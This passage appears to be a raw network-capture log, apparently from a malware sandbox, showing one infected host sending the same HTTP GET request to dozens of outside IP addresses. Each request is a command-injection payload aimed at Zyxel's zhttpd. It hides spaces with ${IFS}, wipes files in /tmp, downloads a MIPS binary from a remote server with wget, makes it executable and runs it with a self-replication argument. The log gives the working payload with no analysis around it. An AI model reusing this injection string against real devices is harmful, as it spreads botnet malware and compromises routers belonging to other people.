                                            Jan 14, 2024 15:50:29.245383024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1434192.168.2.23391529.111.232.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245390892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1435192.168.2.234363832.43.152.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245440006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1436192.168.2.2347796108.186.236.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245461941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1437192.168.2.234158031.239.78.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245471001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1438192.168.2.235587293.235.51.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245491028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1439192.168.2.2356066140.159.196.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245558977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1440192.168.2.235259468.165.251.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245604992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1441192.168.2.2341208210.12.134.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245616913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1442192.168.2.2342484166.75.124.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245640993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1443192.168.2.2342134166.15.10.9443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245650053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1444192.168.2.2347858219.168.85.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245692015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1445192.168.2.235014414.107.88.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245714903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1446192.168.2.2359644111.107.7.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245721102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1447192.168.2.234096272.22.202.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245770931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1448192.168.2.234529678.239.35.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245806932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1449192.168.2.2345594140.94.151.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245836020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1450192.168.2.2334706124.133.35.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245851994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1451192.168.2.233954274.111.246.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245874882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1452192.168.2.234354439.209.134.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245898962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1453192.168.2.2360352149.172.1.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245919943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1454192.168.2.23509564.158.245.244443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245949030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1455192.168.2.2340376182.201.69.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.245992899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1456192.168.2.2334300155.192.136.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246012926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1457192.168.2.2344104171.103.34.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246035099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1458192.168.2.2360212218.35.87.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246052980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1459192.168.2.233501885.2.196.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246077061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1460192.168.2.2348586161.35.123.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246102095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1461192.168.2.235696277.219.237.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246141911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1462192.168.2.2340468142.233.65.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246175051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1463192.168.2.2355166105.68.128.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246175051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1464192.168.2.233336494.184.52.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246212959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1465192.168.2.234760244.115.154.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246236086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1466192.168.2.2348790164.100.221.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246257067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1467192.168.2.2353442111.45.187.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246267080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1468192.168.2.2342758220.114.180.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246314049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1469192.168.2.2342744123.120.176.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246356010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1470192.168.2.235230835.39.180.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246376991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1471192.168.2.2349286128.183.9.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246412992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1472192.168.2.2349954219.116.138.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246423006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1473192.168.2.235199699.103.180.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246471882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1474192.168.2.233925067.209.87.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246490955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1475192.168.2.2334810147.199.152.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246510029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1476192.168.2.23528701.16.145.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246543884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1477192.168.2.234540895.48.120.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246550083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1478192.168.2.235787491.18.157.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246563911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1479192.168.2.2335394102.238.236.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246601105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1480192.168.2.2355524193.23.120.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246642113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1481192.168.2.2359224162.115.193.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246654034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1482192.168.2.2354696205.178.101.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246680021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1483192.168.2.234749451.103.80.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246727943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1484192.168.2.2338902157.194.14.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246752024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1485192.168.2.2337148102.234.78.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246772051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1486192.168.2.234199848.66.211.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246793985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1487192.168.2.2345960135.85.211.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246849060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1488192.168.2.234714423.40.1.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246876001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1489192.168.2.2357818198.251.233.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246903896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1490192.168.2.2353464210.192.50.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246907949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1491192.168.2.2345478120.93.176.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246936083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1492192.168.2.233500227.218.188.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246947050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1493192.168.2.2343638102.83.228.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.246984959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1494192.168.2.234187640.145.183.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247018099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1495192.168.2.2348226169.188.6.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:29.247035980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1496192.168.2.2351276159.1.112.222443
                                            TimestampBytes transferredDirectionData
